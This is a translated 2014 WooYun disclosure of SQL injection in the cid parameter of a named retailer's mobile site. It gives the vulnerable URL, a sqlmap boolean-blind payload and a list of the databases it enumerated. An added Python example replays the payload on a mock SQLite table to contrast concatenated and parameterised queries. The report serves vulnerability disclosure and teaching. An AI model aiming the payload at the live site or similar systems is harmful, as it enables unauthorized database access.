Vulnerability summary (followed by 24)

Vulnerability ID: wooyun-2014-071149

Title: SQL injection vulnerability on a 三九网 sub-site

Vendor: 三九网

Author: 路人甲

Submitted: 2014-08-05 18:28

Fix time: 2014-09-19 18:30

Disclosed: 2014-09-19 18:30

Type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure timeline:

2014-08-05: Actively contacting the vendor and waiting for them to claim the report; details not disclosed publicly
2014-09-19: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

SQL injection vulnerability on a 三九网 sub-site.
Asking for a WooYun invite code.

Details:

Link: http://m.ch999.com/brandlist.aspx?cid=2
Proof: the cid parameter is injectable

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=2) AND 1961=1961 AND (5215=5215
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)


Databases enumerated:

available databases [11]:
[*] CH999C2C
[*] ipaddress
[*] Job39
[*] master
[*] mm999OA
[*] model
[*] msdb
[*] tempdb
[*] v5shop
[*] web999
[*] web999_other



Database: web999
[84 tables]


Proof of vulnerability:

Screenshot: QQ截图20140805180120.jpg


Screenshot: 11.jpg


I did not go any further; there are a few more spots, find them yourselves.

Suggested fix:

Filter the input.
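The fix above is a single word, so here is what it means in practice, as an added example that is not part of the original report: the string-concatenation pattern implied by the sqlmap payload beside a parameterised version, and a check showing the boolean oracle disappears once the parameter is bound. SQLite stands in for the site's SQL Server, and the table name, columns and rows are constructed for the demo.

```python
import sqlite3

# Constructed stand-in data: the real schema behind brandlist.aspx is not
# on the page, so this table and these rows are assumptions for the demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE brandlist (cid INTEGER, brand TEXT)")
    conn.executemany("INSERT INTO brandlist VALUES (?, ?)",
                     [(1, "BrandA"), (2, "BrandB"), (2, "BrandC"), (3, "BrandD")])
    return conn

def brands_vulnerable(conn, cid):
    # The payload "2) AND 1961=1961 AND (5215=5215" closes one parenthesis
    # and reopens another, which implies the original query concatenated
    # cid inside "(cid = ...)" like this.
    sql = "SELECT brand FROM brandlist WHERE (cid = " + cid + ")"
    return [row[0] for row in conn.execute(sql)]

def brands_safe(conn, cid):
    # Hardened form: reject anything that is not an integer, then bind the
    # value as a parameter so it can never alter the query structure.
    try:
        cid_int = int(cid)
    except (TypeError, ValueError):
        raise ValueError("cid must be an integer")
    sql = "SELECT brand FROM brandlist WHERE (cid = ?)"
    return [row[0] for row in conn.execute(sql, (cid_int,))]

# Boolean-based blind injection works because appending a TRUE and a FALSE
# condition yields different responses. TRUE_PAYLOAD is the one sqlmap
# reported on the page; FALSE_PAYLOAD is its constructed counterpart.
TRUE_PAYLOAD = "2) AND 1961=1961 AND (5215=5215"
FALSE_PAYLOAD = "2) AND 1961=1962 AND (5215=5215"

def blind_oracle_leaks(query_fn):
    # True when the two payloads produce different results, i.e. the
    # endpoint behaves as a boolean oracle; False when input is rejected
    # or both payloads behave the same.
    conn = make_db()
    try:
        return query_fn(conn, TRUE_PAYLOAD) != query_fn(conn, FALSE_PAYLOAD)
    except ValueError:
        return False

if __name__ == "__main__":
    print("vulnerable leaks:", blind_oracle_leaks(brands_vulnerable))  # True
    print("hardened leaks:  ", blind_oracle_leaks(brands_safe))        # False
```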

Copyright notice: when reposting, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused